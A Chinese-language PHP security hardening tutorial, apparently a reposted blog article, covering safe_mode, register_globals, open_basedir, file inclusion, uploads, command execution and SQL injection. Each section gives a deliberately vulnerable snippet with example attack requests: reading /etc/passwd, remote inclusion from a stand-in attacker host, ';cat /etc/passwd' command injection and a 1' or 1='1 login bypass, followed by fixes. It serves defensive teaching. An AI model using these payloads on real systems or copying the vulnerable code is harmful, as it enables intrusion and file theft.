PHP_INI_ALL属性的选项就可以使用.htaccess文件设置,也可以通过在脚本程序自身用ini_set()函数设定,它们修改的是Local值,改了以后马上生效。但是.htaccess只对当前目录的脚本程序生效,ini_set()函数只对该脚本程序设置ini_set()函数以后的代码生效。各个版本的选项属性可能不尽相同,可以用如下命令查找当前源代码的main.c文件得到所有的选项,以及它的属性:<br /><br /># grep PHP_INI_ /PHP_SRC/main/main.c<br /><br />在讨论PHP安全配置之前,应该好好了解PHP的safe_mode模式。<br /><br />1、safe_mode<br /><br />safe_mode是唯一PHP_INI_SYSTEM属性,必须通过php.ini或httpd.conf来设置。要启用safe_mode,只需修改php.ini:<br /><br />safe_mode = On<br /><br />或者修改httpd.conf,定义目录:<br /><br /><Directory /var/www><br />   Options FollowSymLinks<br />   php_admin_value safe_mode 1<br /></Directory><br /><br />重启apache后safe_mode就生效了。启动safe_mode,会对许多PHP函数进行限制,特别是和系统相关的文件打开、命令执行等函数。<br />所有操作文件的函数将只能操作与脚本UID相同的文件,比如test.php脚本的内容为:<br /><br /><?include("index.html")?><br /><br />几个文件的属性如下:<br /><br /># ls -la<br />total 13<br />drwxr-xr-x    2 root     root          104 Jul 20 01:25 .<br />drwxr-xr-x   16 root     root          384 Jul 18 12:02 ..<br />-rw-r--r--    1 root     root         4110 Oct 26  2002 index.html<br />-rw-r--r--    1 www-data www-data       41 Jul 19 19:14 test.php<br /><br />在浏览器请求test.php会提示如下的错误信息:<br /><br />Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1<br /><br />如果被操作文件所在目录的UID和脚本UID一致,那么该文件的UID即使和脚本不同也可以访问的,不知这是否是PHP的一个漏洞还是另有隐情。所以php脚本属主这个用户最好就只作这个用途,绝对禁止使用root做为php脚本的属主,这样就达不到safe_mode的效果了。<br /><br />如果想将其放宽到GID比较,则打开 safe_mode_gid可以考虑只比较文件的GID,可以设置如下选项:<br /><br />safe_mode_gid = On<br /><br />设置了safe_mode以后,所有命令执行的函数将被限制只能执行php.ini里safe_mode_exec_dir指定目录里的程序,而且shell_exec、`ls -l`这种执行命令的方式会被禁止。如果确实需要调用其它程序,可以在php.ini做如下设置:<br /><br />safe_mode_exec_dir = /usr/local/php/exec<br /><br />然后拷贝程序到该目录,那么php脚本就可以用system等函数来执行该程序。而且该目录里的shell脚本还是可以调用其它目录里的系统命令。<br /><br />safe_mode_include_dir string<br />当从此目录及其子目录(目录必须在 include_path 中或者用完整路径来包含)包含文件时越过 UID/GID 检查。 <br /><br />从 PHP 4.2.0 开始,本指令可以接受和 include_path 指令类似的风格用分号隔开的路径,而不只是一个目录。 <br /><br />指定的限制实际上是一个前缀,而非一个目录名。这也就是说“safe_mode_include_dir = /dir/incl”将允许访问“/dir/include”和“/dir/incls”,如果它们存在。如果您希望将访问控制在一个指定的目录,那么请在结尾加上一个斜线,例如:“safe_mode_include_dir = /dir/incl/”。 <br /><br />safe_mode_allowed_env_vars string<br />设置某些环境变量可能是潜在的安全缺口。本指令包含有一个逗号分隔的前缀列表。在安全模式下,用户只能改变那些名字具有在这里提供的前缀的环境变量。默认情况下,用户只能设置以 PHP_ 开头的环境变量(例如 PHP_FOO = BAR)。 <br /><br />注: 如果本指令为空,PHP 将使用户可以修改任何环境变量! <br /><br />safe_mode_protected_env_vars string<br />本指令包含有一个逗号分隔的环境变量的列表,最终用户不能用 putenv() 来改变这些环境变量。甚至在 safe_mode_allowed_env_vars 中设置了允许修改时也不能改变这些变量。 <br /><br />虽然safe_mode不是万能的(低版本的PHP可以绕过),但还是强烈建议打开安全模式,在一定程度上能够避免一些未知的攻击。不过启用safe_mode会有很多限制,可能对应用带来影响,所以还需要调整代码和配置才能和谐。被安全模式限制或屏蔽的函数可以参考PHP手册。<br /><br />讨论完safe_mode后,下面结合程序代码实际可能出现的问题讨论如何通过对PHP服务器端的配置来避免出现的漏洞。<br /><br />2、变量滥用<br /><br />PHP默认register_globals = On,对于GET, POST, Cookie, Environment, Session的变量可以直接注册成全局变量。它们的注册顺序是variables_order = "EGPCS"(可以通过php.ini修改),同名变量variables_order右边的覆盖左边,所以变量的滥用极易造成程序的混乱。而且脚本程序员往往没有对变量初始化的习惯,像如下的程序片断就极易受到攻击:<br /><br /><?<br />//test_1.php<br /><br />if ($pass == "hello")<br />    $auth = 1;<br /><br />if ($auth == 1)<br />    echo "some important information";<br />else<br />    echo "nothing";<br />?><br /><br />攻击者只需用如下的请求就能绕过检查:<br /><a href="http://victim/test_1.php?auth=1">http://victim/test_1.php?auth=1</a><br /><br />这虽然是一个很弱智的错误,但一些著名的程序也有犯过这种错误,比如phpnuke的远程文件拷贝漏洞:<a href="http://www.securityfocus.com/bid/3361">http://www.securityfocus.com/bid/3361</a><br /><br />PHP-4.1.0发布的时候建议关闭register_globals,并提供了7个特殊的数组变量来使用各种变量。对于从GET、POST、COOKIE等来的变量并不会直接注册成变量,必需通过数组变量来存取。PHP-4.2.0发布的时候,php.ini默认配置就是register_globals = Off。这使得程序使用PHP自身初始化的默认值,一般为0,避免了攻击者控制判断变量。<br /><br />解决方法:<br /><br />配置文件php.ini设置register_globals = Off。<br /><br />要求程序员对作为判断的变量在程序最开始初始化一个值。<br /><br />3、文件打开<br /><br />极易受攻击的代码片断:<br /><br /><?<br />//test_2.php<br /><br />if (!($str = readfile("$filename"))) {<br />    echo("Could not open file: $filename<BR>/n");<br />    exit;<br />}<br />else {<br />    echo $str;<br />}<br />?><br /><br />由于攻击者可以指定任意的$filename,攻击者用如下的请求就可以看到/etc/passwd:<br /><br /><a href="http://victim/test_2.php?filename=/etc/passwd">http://victim/test_2.php?filename=/etc/passwd</a><br /><br />如下请求可以读php文件本身:<br /><br /><a href="http://victim/test_2.php?filename=test_2.php">http://victim/test_2.php?filename=test_2.php</a><br /><br />PHP中文件打开函数还有fopen(), file()等,如果对文件名变量检查不严就会造成服务器重要文件被访问读取。<br /><br />解决方法:<br /><br />如非特殊需要,把php的文件操作限制在web目录里面。以下是修改apache配置文件httpd.conf的一个例子:<br /><br /><Directory /usr/local/apache/htdocs><br />    php_admin_value open_basedir /usr/local/apache/htdocs<br /></Directory><br /><br />重启apache后,/usr/local/apache/htdocs目录下的PHP脚本就只能操作它自己目录下的文件了,否则PHP就会报错:<br /><br />Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.<br /><br />使用safe_mode模式也能避免这种问题,前面已经讨论过了。<br /><br />4、包含文件<br /><br />极易受攻击的代码片断:<br /><br /><?<br />//test_3.php<br /><br />if(file_exists($filename))<br />    include("$filename");<br />?><br /><br />这种不负责任的代码会造成相当大的危害,攻击者用如下请求可以得到/etc/passwd文件:<br /><br /><a href="http://victim/test_3.php?filename=/etc/passwd">http://victim/test_3.php?filename=/etc/passwd</a><br /><br />如果对于Unix版的PHP(Win版的PHP不支持远程打开文件)攻击者可以在自己开了http或ftp服务的机器上建立一个包含shell命令的文件,如<a href="http://attack/attack.txt">http://attack/attack.txt</a>的内容是<?passthru("ls /etc")?>,那么如下的请求就可以在目标主机执行命令ls /etc:<br /><br /><a href="http://victim/test_3.php?filename=http://attack/attack.txt">http://victim/test_3.php?filename=http://attack/attack.txt</a><br /><br />攻击者甚至可以通过包含apache的日志文件access.log和error.log来得到执行命令的代码,不过由于干扰信息太多,有时不易成功。<br />对于另外一种形式,如下代码片断:<br /><br /><?<br />//test_4.php<br /><br />include("$lib/config.php");<br />?><br /><br />攻击者可以在自己的主机建立一个包含执行命令代码的config.php文件,然后用如下请求也可以在目标主机执行命令:<br /><br /><a href="http://victim/test_4.php?lib=http://attack">http://victim/test_4.php?lib=http://attack</a><br /><br />PHP的包含函数有include(), include_once(), require(), require_once。如果对包含文件名变量检查不严就会对系统造成严重危险,可以远程执行命令。<br /><br />解决方法:<br /><br />要求程序员包含文件里的参数尽量不要使用变量,如果使用变量,就一定要严格检查要包含的文件名,绝对不能由用户任意指定。<br /><br />如前面文件打开中限制PHP操作路径是一个必要的选项。另外,如非特殊需要,一定要关闭PHP的远程文件打开功能。修改php.ini文件:<br /><br />allow_url_fopen = Off<br /><br />重启apache。 <br /><br />5、文件上传<br /><br />php的文件上传机制是把用户上传的文件保存在php.ini的upload_tmp_dir定义的临时目录(默认是系统的临时目录,如:/tmp)里的一个类似phpxXuoXG的随机临时文件,程序执行结束,该临时文件也被删除。PHP给上传的文件定义了四个变量:(如form变量名是file,而且register_globals打开)<br /><br />$file        #就是保存到服务器端的临时文件(如/tmp/phpxXuoXG )<br />$file_size    #上传文件的大小<br />$file_name    #上传文件的原始名称<br />$file_type    #上传文件的类型<br /><br />推荐使用:<br /><br />$HTTP_POST_FILES['file']['tmp_name']<br />$HTTP_POST_FILES['file']['size'] <br />$HTTP_POST_FILES['file']['name'] <br />$HTTP_POST_FILES['file']['type']<br /><br />这是一个最简单的文件上传代码:<br /><br /><?<br />//test_5.php<br /><br />if(isset($upload) && $file != "none") {<br />    copy($file, "/usr/local/apache/htdocs/upload/".$file_name);<br />    echo "文件".$file_name."上传成功!点击<a href=/"$PHP_SELF/">继续上传</a>";<br />    exit;<br />}<br />?><br /><html><br /><head><br /><title>文件上传</title><br /><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><br /></head><br /><body bgcolor="#FFFFFF"><br /><form enctype="multipart/form-data" method="post"><br />上传文件:<br /><input type="file"  name="file" size="30"><br /><input type="submit" name="upload" value="上传"><br /></form><br /></body><br /></html><br /><br />这样的上传代码存在读取任意文件和执行命令的重大问题。<br />下面的请求可以把/etc/passwd文档拷贝到web目录/usr/local/apache/htdocs/test(注意:这个目录必须nobody可写)下的attack.txt文件里:<br /><br /><a href="http://victim/test_5.php?upload=1&file=/etc/passwd&file_name=attack.txt">http://victim/test_5.php?upload=1&file=/etc/passwd&file_name=attack.txt</a><br /><br />然后可以用如下请求读取口令文件:<br /><br /><a href="http://victim/test/attack.txt">http://victim/test/attack.txt</a><br /><br />攻击者可以把php文件拷贝成其它扩展名,泄漏脚本源代码。<br />攻击者可以自定义form里file_name变量的值,上传覆盖任意有写权限的文件。<br />攻击者还可以上传PHP脚本执行主机的命令。<br /><br />解决方法:<br /><br />PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数,可以检查操作的文件是否是用户上传的文件,从而避免把系统文件拷贝到web目录。<br />使用$HTTP_POST_FILES数组来读取用户上传的文件变量。<br />严格检查上传变量。比如不允许是php脚本文件。<br /><br />把PHP脚本操作限制在web目录可以避免程序员使用copy函数把系统文件拷贝到web目录。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。<br />把PHP脚本用phpencode进行加密,避免由于copy操作泄漏源码。<br />严格配置文件和目录的权限,只允许上传的目录能够让nobody用户可写。<br />对于上传目录去掉PHP解释功能,可以通过修改httpd.conf实现:<br /><br /><Directory /usr/local/apache/htdocs/upload><br />      php_flag engine off<br />      #如果是php3换成php3_engine off<br /></Directory><br /><br />重启apache,upload目录的php文件就不能被apache解释了,即使上传了php文件也没有问题,只能直接显示源码。<br /><br />6、命令执行<br /><a href="http://blog.csdn.net/litowen/article/details/91022"></a><br />下面的代码片断是从PHPNetToolpack摘出,详细的描述见:<br /><br /><a href="http://www.securityfocus.com/bid/4303">http://www.securityfocus.com/bid/4303</a><br /><br /><?<br />//test_6.php<br /><br />system("traceroute $a_query",$ret_strs);<br />?><br /><br /><br /></p><p>由于程序没有过滤$a_query变量,所以攻击者可以用分号来追加执行命令。<br /><br />攻击者输入如下请求可以执行cat /etc/passwd命令:<br /><br /><a href="http://victim/test_6.php?a_query=www.example.com;cat">http://victim/test_6.php?a_query=www.example.com;cat</a> /etc/passwd <br /><br />PHP的命令执行函数还有system(), passthru(), popen()和``等。命令执行函数非常危险,慎用。如果要使用一定要严格检查用户输入。<br /><br />解决方法:<br /><br />要求程序员使用escapeshellcmd()函数过滤用户输入的shell命令。<br /><br />启用safe_mode可以杜绝很多执行命令的问题,不过要注意PHP的版本一定要是最新的,小于PHP-4.2.2的都可能绕过safe_mode的限制去执行命令。<br /><br />7、sql_inject<br /><br />如下的SQL语句如果未对变量进行处理就会存在问题:<br /><br />select * from login where user='$user' and pass='$pass'<br /><br /><br /></p><br />攻击者可以用户名和口令都输入1' or 1='1绕过验证。<br /><br />不过幸亏PHP有一个默认的选项magic_quotes_gpc = On,该选项使得从GET, POST, COOKIE来的变量自动加了addslashes()操作。上面SQL语句变成了:<br /><br />select * from login where user='1/' or 1=/'1' and pass='1/' or 1=/'1'<br /><br />从而避免了此类sql_inject攻击。<br /><br />对于数字类型的字段,很多程序员会这样写:<br /><br />select * from test where id=$id<br />由于变量没有用单引号扩起来,就会造成sql_inject攻击。幸亏MySQL功能简单,没有sqlserver等数据库有执行命令的SQL语句,而且PHP的mysql_query()函数也只允许执行一条SQL语句,所以用分号隔开多条SQL语句的攻击也不能奏效。但是攻击者起码还可以让查询语句出错,泄漏系统的一些信息,或者一些意想不到的情况。<br /><br />解决方法:<br /><br />要求程序员对所有用户提交的要放到SQL语句的变量进行过滤。<br />即使是数字类型的字段,变量也要用单引号扩起来,MySQL自己会把字串处理成数字。<br />在MySQL里不要给PHP程序高级别权限的用户,只允许对自己的库进行操作,这也避免了程序出现问题被 SELECT INTO OUTFILE ... 这种攻击。<br /><br />8、警告及错误信息<br /><br />PHP默认显示所有的警告及错误信息:<br /><br />error_reporting  =  E_ALL & ~E_NOTICE<br />display_errors = On<br /><br />在平时开发调试时这非常有用,可以根据警告信息马上找到程序错误所在。<br />正式应用时,警告及错误信息让用户不知所措,而且给攻击者泄漏了脚本所在的物理路径,为攻击者的进一步攻击提供了有利的信息。而且由于自己没有访问到错误的地方,反而不能及时修改程序的错误。所以把PHP的所有警告及错误信息记录到一个日志文件是非常明智的,即不给攻击者泄漏物理路径,又能让自己知道程序错误所在。<br /><br />修改php.ini中关于Error handling and logging部分内容:<br /><br />error_reporting  =  E_ALL<br />display_errors = Off<br />log_errors = On<br />error_log = /usr/local/apache/logs/php_error.log<br /><br />然后重启apache,注意文件/usr/local/apache/logs/php_error.log必需可以让nobody用户可写。<br /><br />9、disable_functions<br /><br />如果觉得有些函数还有威胁,可以设置php.ini里的disable_functions(这个选项不能在httpd.conf里设置),比如:<br /><br />disable_functions = phpinfo, get_cfg_var<br /><br />可以指定多个函数,用逗号分开。重启apache后,phpinfo, get_cfg_var函数都被禁止了。建议关闭函数phpinfo, get_cfg_var,这两个函数容易泄漏服务器信息,而且没有实际用处。<br /><br />10、disable_classes<br /><br />这个选项是从PHP-4.3.2开始才有的,它可以禁用某些类,如果有多个用逗号分隔类名。disable_classes也不能在httpd.conf里设置,只能在php.ini配置文件里修改。<br /><br />11、open_basedir<br /><br />前面分析例程的时候也多次提到用open_basedir对脚本操作路径进行限制,这里再介绍一下它的特性。用open_basedir指定的限制实际上是前缀,不是目录名。也就是说 "open_basedir = /dir/incl" 也会允许访问 "/dir/include" 和 "/dir/incls",如果它们存在的话。如果要将访问限制在仅为指定的目录,用斜线结束路径名。例如:"open_basedir = /dir/incl/"。<br />可以设置多个目录,在Windows中,用分号分隔目录。在任何其它系统中用冒号分隔目录。作为Apache模块时,父目录中的open_basedir路径自动被继承。<br /><br />四、其它安全配置<br /><br />1、取消其它用户对常用、重要系统命令的读写执行权限<br /><br />一般管理员维护只需一个普通用户和管理用户,除了这两个用户,给其它用户能够执行和访问的东西应该越少越好,所以取消其它用户对常用、重要系统命令的读写执行权限能在程序或者服务出现漏洞的时候给攻击者带来很大的迷惑。记住一定要连读的权限也去掉,否则在linux下可以用/lib/ld-linux.so.2 /bin/ls这种方式来执行。<br />如果要取消某程如果是在chroot环境里,这个工作比较容易实现,否则,这项工作还是有些挑战的。因为取消一些程序的执行权限会导致一些服务运行不正常。PHP的mail函数需要/bin/sh去调用sendmail发信,所以/bin/bash的执行权限不能去掉。这是一项比较累人的工作,<br /><br />2、去掉apache日志其它用户的读权限<br /><br />apache的access-log给一些出现本地包含漏洞的程序提供了方便之门。通过提交包含PHP代码的URL,可以使access-log包含PHP代码,那么把包含文件指向access-log就可以执行那些PHP代码,从而获得本地访问权限。<br />如果有其它虚拟主机,也应该相应去掉该日志文件其它用户的读权限。<br /><br />当然,如果你按照前面介绍的配置PHP那么一般已经是无法读取日志文件了。 <a href="http://blog.csdn.net/litowen/article/details/91022">查看原文>> </a><p><br /></p>

正文结束

PHP接口(interface)和抽象类(abstract) 如何对PHP程序中的常见漏洞进行攻击(下)